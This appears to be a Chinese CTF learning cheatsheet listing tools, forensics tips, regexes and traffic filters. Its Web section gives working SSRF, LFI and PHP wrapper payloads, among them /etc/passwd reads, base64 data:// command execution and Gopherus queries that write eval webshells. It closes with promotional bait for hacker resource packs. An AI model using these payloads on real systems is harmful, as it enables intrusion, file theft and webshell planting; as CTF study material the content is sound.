CTF学习、项目、工具知识仓库（非常详细）零基础入门到精通，收藏这一篇就够了

CTF项目

• CTF Wiki：https://ctf-wiki.org/

• CTF Time：https://ctftime.org/

• 攻防世界：https://adworld.xctf.org.cn/

• Hacker 101：https://www.hacker101.com/

• Cryptopals：密码学练习题目 https://cryptopals.com/

• Awesome-ctf：https://github.com/apsdehal/awesome-ct

CTF工具

综合工具

• CTF Tools：https://github.com/zardus/ctf-tools

Crypto

• CyberChef：综合编解码及加密，可本地部署 https://github.com/gchq/CyberChef

• OK Tools在线工具：https://github.com/wangyiwy/oktools

• CTF在线工具：http://www.hiencode.com/

• XSSEE：在线综合编解码 https://evilcos.me/lab/xssee/

• MeTools：在线综合编解码 http://www.metools.info/code/quotedprintable231.html

• MD5 Hash：https://www.somd5.com/

• GB2312：http://code.mcdvisa.com/

• Unicode字符表：https://www.52unicode.com/enclosed-alphanumerics-zifu

• Unicode：https://www.compart.com/en/unicode/

• UUencode：http://web.chacuo.net/charsetuuencode

• XXencode：输入文本以每三个字节为单位进行编码 http://web.chacuo.net/charsetxxencode

• Escape/Unescape：https://tool.chinaz.com/tools/escape.aspx

• HTML实体编码：https://zh.rakko.tools/tools/21/

• 摩斯电码：http://moersima.00cha.net/

• 摩斯电码：http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx

• 栅栏密码：https://www.qqxiuzi.cn/bianma/zhalanmima.php

• 猪圈密码：http://www.hiencode.com/pigpen.html

• 零宽字符：http://330k.github.io/misc_tools/unicode_steganography.html

• Base64填充位隐写读取：https://github.com/cjcslhp/wheels/tree/master/b64stego

• yafu：RSA解题中的因式分解 https://github.com/bbuhrow/yafu

Misc

图片

• Stegsolve：图片隐写 http://www.caesum.com/handbook/stego.ht

• 图虫在线EXIF查看器：https://exif.tuchong.com/

• EXIF查看器：exiftool https://exiftool.org/

• 盲水印提取：https://github.com/chishaxie/BlindWaterMark

• OCR在线识别：https://web.baimiaoapp.com/

• 解决拼图问题：montage+gaps https://github.com/nemanja-m/gaps

• 在线绘制二维码/汉信码：https://www.pixilart.com/draw?ref=home-page

• 在线绘制二维码：https://merricx.github.io/qrazybox/

• 在线扫描一维码：https://online-barcode-reader.inliteresearch.com/

音视频

• Audacity：音频隐写 https://www.audacityteam.org/

• Mp3Stego：Mp3音频隐写 https://www.petitcolas.net/steganography/mp3stego/

流量分析

• Pcap流量包在线修复：http://f00l.de/hacking/pcapfix.php

日志分析

• ProcessMonitor：进程监视器 https://learn.microsoft.com/zh-cn/sysinternals/downloads/procmon

• Event log explorer：日志查看器 https://www.eventlogxp.com/

数据处理

• 010 Editor：https://www.sweetscape.com/010editor/

• Binwalk：https://github.com/ReFirmLabs/binwalk

• 在线正则表达式：https://c.runoob.com/front-end/854/

Web

• localhost绕过：127.0.0.1 >>> 2130706433 https://www.browserling.com/tools/ip-to-dec

Pwn

• Pwntools：CTF框架和漏洞利用开发库 https://github.com/Gallopsled/pwntools

Reverse

• ExEinfo PE：查看PE文件信息

• PEID：查壳工具

• Cutter：https://cutter.re/

• IDA：https://hex-rays.com/ida-pro/

• Ollydbg：https://www.ollydbg.de/

• angr：二进制分析 https://github.com/angr/angr

Cheatsheet

Tips

搜索flag

grep -rn “flag{” /*

find / -type f -name '*' | xargs grep "flag{"

Crypto

常见加密/编码算法特征

1.Base64

一般只包含以下字符：

`ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/`

2.AES

密钥长度是128bit或者256bit，长度都是16字节。

密文是128或256的整倍数。

3.DES

密钥长度固定8字节。密钥需要运行初始化函数进行单独初始化。

分段加密，每8字节分段。

4.RSA

非对称加密算法，密钥需要单独初始化。

密钥长度一般很长，存储格式为base64文本。

5. ECC

密钥需要单独初始化。

Misc

常用命令

1.file

• 在文件无格式或格式不明时判断文件类型。

  
  
  `> file Exploit.class``Exploit.class: compiled Java class data, version 52.0 (Java 1.8)`
  
  
  

2.binwalk & foremost

• 分离提取隐写的文件。

3.dd

• 用于读取、转换并输出数据。

4.openssl

openssl rsautl -decrypt -in whoami.txt -inkey private.key out flag.txt

常用正则表达式

1.中国手机号

• 手机号为11 位10进制数字字符串。

  ^(13[0-9]|14[01456879]|15[0-35-9]|16[2567]|17[0-8]|18[0-9]|19[0-35-9])\d{8}$
  

• 带中划线的手机号码

  ^[+]{0,1}(d){1,3}[ ]?([-]?((d)|[ ]){1,12})+$
  

2.电话号码

• “XXX-XXXXXXX”、“XXXX-XXXXXXXX”

  (\(\d{3,4}\)|\d{3,4}-|\s)?\d{8}
  

• “XXX-XXXXXXX”、“XXXX-XXXXXXXX”、“XXX-XXXXXXX”、“XXX-XXXXXXXX”、“XXXXXXX"和"XXXXXXXX”

  ^(\(\d{3,4}-)|\d{3.4}-)?\d{7,8}$
  

• 国内电话号码(0511-4405222、021-87888822)

  \d{3}-\d{8}|\d{4}-\d{7}
  

• 支持手机号码，3-4位区号，7-8位直播号码，1－4位分机号

   ((\d{11})|^((\d{7,8})|(\d{4}|\d{3})-(\d{7,8})|(\d{4}|\d{3})-(\d{7,8})-(\d{4}|\d{3}|\d{2}|\d{1})|(\d{7,8})-(\d{4}|\d{3}|\d{2}|\d{1}))$)
  

4.国际移动设备识别码（IMEI）

• IMEI（15 位十进制数字：14 位加上一个校验位）用于表示有关设备来源、型号和序列号的信息。

• 15位由TAC(+FAC) + SNR + CD组成。末尾采用Luhn 校验位。

  /^\d{15,17}$/
  

6.IP地址（IPv4）

• 由四段数字组成，例如192.168.0.1，其中的数字都是十进制的数字，中间用实心圆点分隔。

  ((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}
  

  ((?:(?:25[0-5]|2[0-4]\d|[01]?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d?\d))
  

7.域名

[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA-Z0-9][-a-zA-Z0-9]{0,62})+\.?

^((http:\/\/)|(https:\/\/))?([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}(\/)

8.URL

[a-zA-z]+://[^\s]* 或 ^http://([\w-]+\.)+[\w-]+(/[\w-./?%&=]*)?$

9.邮箱地址（Email）

^\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*$

^[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+$

wireshark流量分析

• 过滤IP：

ip.src eq xxx.xxx.xxx.xxx or ip.dst eq xxx.xxx.xxx.xxx

ip.addr eq xxx.xxx.xxx.xxx

• 过滤端口：

tcp.port eq 80 or udp.port eq 80

tcp.dstport == 80 or tcp.srcport == 80

tcp.port >=1 and tcp.port <=80

• 过滤协议：

tcp/udp/arp/icmp/http/ftp/dns/ip

• 过滤MAC：

eth.dst == A0:04:C6:85:63:73

• HTTP过滤：

http.request.method == "GET"

http.request.method == "POST"

http.request.uri == "/img/logo.png"

http contains "GET"

http contains "HTTP/1."

http.request.method == "GET" && http contains "User-Agent:"

tshark流量分析

tshark -r **.pcap –Y ** -T fields –e ** | **** > data``----------------------------------------------------------------``tshark -r capture.pcapng -T fields -e usb.capdata > data2.txt

Usage:`  `-Y <display filter>      packet displaY filter in Wireshark display filter`                           `syntax`  `-T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|?`                           `format of text output (def: text)`  `-e <field>               field to print if -Tfields selected (e.g. tcp.port,`                           `_ws.col.Info)

通过-Y过滤器 (与 wireshark 一致), 然后用-T filds -e配合指定显示的数据段 (比如 usb.capdata)

-e后的参数不确定可以由 wireshark 右击需要的数据选中后得到

Unicode四种编码形式

源文本：The

&#x [Hex]: The``&# [Decimal]: The``\U [Hex]: \U0054\U0068\U0065``\U+ [Hex]: \U+0054\U+0068\U+0065

图片分析

图片分析的一般步骤：

1. 首先查看EXIF信息。

2. 如果图片在windows下能查看，kali下无法查看，说明格式数据错误，可以修改图片的长宽高来显示隐藏图像。

3. 通过binwalk或者foremost查看是否有隐藏文件。

4. 通过stegsolve进行色差分析，查看zlib数据段。

5. 查看文件是否包含有损坏的其他文件，查找文件中是否有可疑字符串，例如flag、key、pass。

6. 验证是否存在隐写，例如LSB隐写。

jpg长宽修改

修改图片高度， FF C0后的第4个字节和第5个字节

png长宽修改

`修改0x14到0x17的四个字节`

修改后：

压缩包分析

不同压缩包分析方法分别用于：

1. ZIP暴力破解：文件的密码为纯数字且位数不多时。

2. ZIP伪加密：ZIP文件的压缩源文件目录中09 00修改为00 00，可以成功解压时。

3. CRC32攻击：当文件数据少且文件大小较小时。

4. 明文攻击：加密文件中存在部分已知文件（>12字节）时。

一些tips：

• 文件打不开，显示“压缩文件已损坏”时，尝试winrar工具中的修复功能进行修复。

zip伪加密

zip文件组成：

• 压缩源文件数据区 50 4B 03 04（0x04034b50）

• 压缩源文件目录区 50 4B 01 02（0x02014b50）

• 压缩源文件目录结束标志50 4B 05 06（0x06054b50）

压缩源文件数据区：

50 4B 03 04：这是头文件标记（0x04034b50）``14 00：解压文件所需 pkware 版本``09 00：全局方式位标记（有无加密）``08 00：压缩方式``50 A3：最后修改文件时间``A5 4A：最后修改文件日期``21 38 76 64：CRC-32校验（1480B516）``19 00 00 00：压缩后尺寸（25）``17 00 00 00：未压缩尺寸（23）``08 00：文件名长度``00 00：扩展记录长度

压缩源文件目录区：

50 4B 01 02：目录中文件文件头标记(0x02014b50)``1F 00：压缩使用的 pkware 版本``14 00：解压文件所需 pkware 版本``09 00：全局方式位标记（有无加密，这个更改这里进行伪加密，改为09 00打开就会提示有密码了）``08 00：压缩方式``50 A3：最后修改文件时间``A5 4A：最后修改文件日期``21 38 76 65：CRC-32校验（1480B516）``19 00 00 00：压缩后尺寸（25）``17 00 00 00：未压缩尺寸（23）``08 00：文件名长度``24 00：扩展字段长度``00 00：文件注释长度``00 00：磁盘开始号``00 00：内部文件属性``20 00 00 00：外部文件属性``00 00 00 00：局部头部偏移量

压缩文件源文件目录结束区：

50 4B 05 06：目录结束标记(0x06054b50)``00 00：当前磁盘编号``00 00：目录区开始磁盘编号``01 00：本磁盘上纪录总数``01 00：目录区中纪录总数``59 00 00 00：目录区尺寸大小``3E 00 00 00 00：目录区对第一张磁盘的偏移量``00 00：ZIP文件注释长度

真假加密：

# 无加密` `压缩源文件数据区的全局加密应当为00 00``且压缩源文件目录区的全局方式位标记应当为00 00

# 假加密``压缩源文件数据区的全局加密应当为00 00``且压缩源文件目录区的全局方式位标记应当为09 00

# 真加密``压缩源文件数据区的全局加密应当为09 00``且压缩源文件目录区的全局方式位标记应当为09 00

判断伪加密 ZipCenOp

java -jar ZipCenOp.jar xxx.zip

**Windows日志分析**

常见安全事件

• 检索4624/4625登录事件，爆破时间点与登录事件点一一对应的可能是异常账户。

4624  --登录成功`   `4625  --登录失败`  `4634 -- 注销成功``4647 -- 用户启动的注销`   `4672 -- 使用超级用户（如管理员）进行登录

Web

localhost绕过

http://127.0.0.1:80``http://localhost:22``http://[::]:80/  >>>  http://127.0.0.1``http://example.com@127.0.0.1``http://127.0.0.1.xip.io/``http://127。0。0。1  >>>  http://127.0.0.1``http://0/``   ``# 十六进制、八进制转换``http://127.0.0.1  >>>  http://0177.0.0.1/``   ``# 转换为小数 https://www.browserling.com/tools/ip-to-dec``http://127.0.0.1  >>>  http://2130706433/

Gopherus

# mysql``> python2 gopherus.py --exploit mysql``---------------------------------------------``Give MySQL username: root``Give query to execute: select "<?php phpinfo();?>" into outfile "/var/www/html/gopher.php"

select "<?php @eval($_POST[c]);?>" into outfile "/var/www/html/gopher.php"

SSRF payload

• PayloadsAllTheThings

file

file://path/to/file``file:///etc/passwd``file://\/\/etc/passwd``ssrf.php?url=file:///etc/passwd

http

ssrf.php?url=http://127.0.0.1:22``ssrf.php?url=http://127.0.0.1:80``ssrf.php?url=http://127.0.0.1:443

dict

dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>``ssrf.php?url=dict://attacker:11111/

LFI payload

index.php?path=php://filter/read=convert.base64-encode/resource=flag.php

PHP伪协议

file协议：

http://ip:port/readme.php?filename=file:///var/log/auth.log

filter协议：

http://ip:port/readme.php?filename=php://filter/read/convert.base64-encode/resource=./index.php(或者其他读取文件中含有php代码)

filter+file协议：

http://ip:port/readme.php?filename=php://filter/read/convert.base64-encode/resource=file:///etc/passwd

input协议：

http://ip:port/readme.php?filename=php://www.test.com?filename=php://input``   ``# POST方式，参数为：``<?php phpinfo();?>

data协议：

data://text/plain;base64,``   ``# 打印data://的内容``<?php``// 打印 "I love PHP"``echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo=');``?>

# 执行系统命令``# 将 <?php system(whoami)?> base64编码：PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==``http://ip:port/readme.php?filename=data://text/plain;base64,PD9waHAgc3lzdGVtKHdob2FtaSk/Pg==``   ``# 也可以将webshell进行base64编码/或不编码``http://ip:port/readme.php?filename=data://text/plain;base64,<?php eval($_POST["cmd"];)?>

Pwn

Pwntools

导入包：

`> from pwn import *`

建立/关闭连接：

# 本地连接``sh = process("./code")

# 远程连接``sh = remote("127.0.0.1",6666)

# 关闭连接``sh.close()

I/O操作：

# 发送数据``sh.send(data)``   ``# 发送一行数据``sh.sendline(data)

# 接收数据，numb指定接收字节``sh.recv(numb=1024, timeout = default)``   ``# 接收一行数据，keepends表示是否保留行尾\n``sh.recvline(keepends = True)``   ``# 接收数据直到设置的标志出现``sh.recvutil("Hello\n", drop=false)``   ``# 持续接收数据直到EOF``sh.recvall()``   ``# 持续接收数据直到EOF或timeout``sh.recvrepeat(timeout = default)

# 直接进行交互，在取得shell后使用``sh.interactive()

Reverse

IDA快捷键

功能	快捷键
切换文本视图与图表视图	空格键
返回上一个操作地址	ESC
搜索地址和符号	G
对符号进行重命名	N
常规注释	冒号
可重复注释	分号
添加标签	Alt+M
查看标签	Ctrl+M
查看段的信息	Ctrl+S
查看交叉应用	X
查看伪代码	F5
搜索文本	Alt+T
搜索十六进制	Alt+B

Scripts

• 分割图片恢复原图：https://github.com/Threekiii/Awesome-CTF/blob/master/scripts/misc/image_merge.py

• 二维码010101绘制：

• https://github.com/Threekiii/Awesome-CTF/blob/master/scripts/misc/qrcode_painter_1.py

• https://github.com/Threekiii/Awesome-CTF/blob/master/scripts/misc/qrcode_painter_2.py

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享